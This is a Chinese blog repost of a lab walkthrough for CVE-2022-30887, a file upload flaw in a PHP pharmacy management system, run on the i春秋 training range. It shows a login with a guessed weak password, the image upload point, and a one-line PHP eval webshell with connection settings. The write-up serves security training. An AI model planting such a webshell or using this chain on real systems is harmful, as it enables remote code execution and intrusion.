CVE-2022-30887(文件上传漏洞)

admin 2023年8月5日11:07:56评论17 views字数 850阅读2分50秒阅读模式


漏洞简介

……

    多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该CMS中

php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。

漏洞复现

……

邮箱登录:账户名/密码:

[email protected]/mayurik)

漏洞类型:文件上传漏洞

  • 滑至页面最下端,发现跳转连接Mayuri K,点击跳转连接。

CVE-2022-30887(文件上传漏洞)

CVE-2022-30887(文件上传漏洞)


  • 任意点击页面,意外发现弹出了作者邮箱。

CVE-2022-30887(文件上传漏洞)

CVE-2022-30887(文件上传漏洞)

  • 弱口令尝试登录(Mayurik 、Mayuri  、mayuri 、mayurik,最终mayurik登录成功)。

CVE-2022-30887(文件上传漏洞)


  • 经过摸索探寻(其他尝试点本文略)终于找到了上传点Medicile Add Medicine。

CVE-2022-30887(文件上传漏洞)


  • 上传webshell(一句话木马),如图。
CVE-2022-30887(文件上传漏洞)
<?php @eval($_POST['cmd']);?>  #一句话木马
  • 连接webshell。

添加url:

http://eci-2ze6nny1geql8lp55w5x.cloudeci1.ichunqiu.com/assets/myimages/cmd.php(assets/myimages/cmd.php右键源码查找) 

连接密码:cmd

编码器:选择base64

CVE-2022-30887(文件上传漏洞)

CVE-2022-30887(文件上传漏洞)


关于我们

团队由工控安全、逆向分析、安全开发、漏洞挖掘等众多领域专家组成;


在那动荡的几年中,我们支撑完成若干安全一线项目,安全应急省级项目我们在第一线、国家基础设施安全爆发我们在第一线、XX行动我们首当其冲;


在这几年中我们遇到了很多好朋友,与众多安全中立安全团队保持良好合作,我们互通有无,积极的分享那本该属于黑客精神的东西;


希望我们有一段酣畅淋漓的合作;


我们的公众号:暗影安全


我们的官网: www.shadowsec.org


我们一直在...

CVE-2022-30887(文件上传漏洞)



本文漏洞环境来源于i春秋云境靶场



原文始发于微信公众号(暗影安全):CVE-2022-30887(文件上传漏洞)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月5日11:07:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2022-30887(文件上传漏洞)http://cn-sec.com/archives/1935549.html

发表评论

匿名网友 填写信息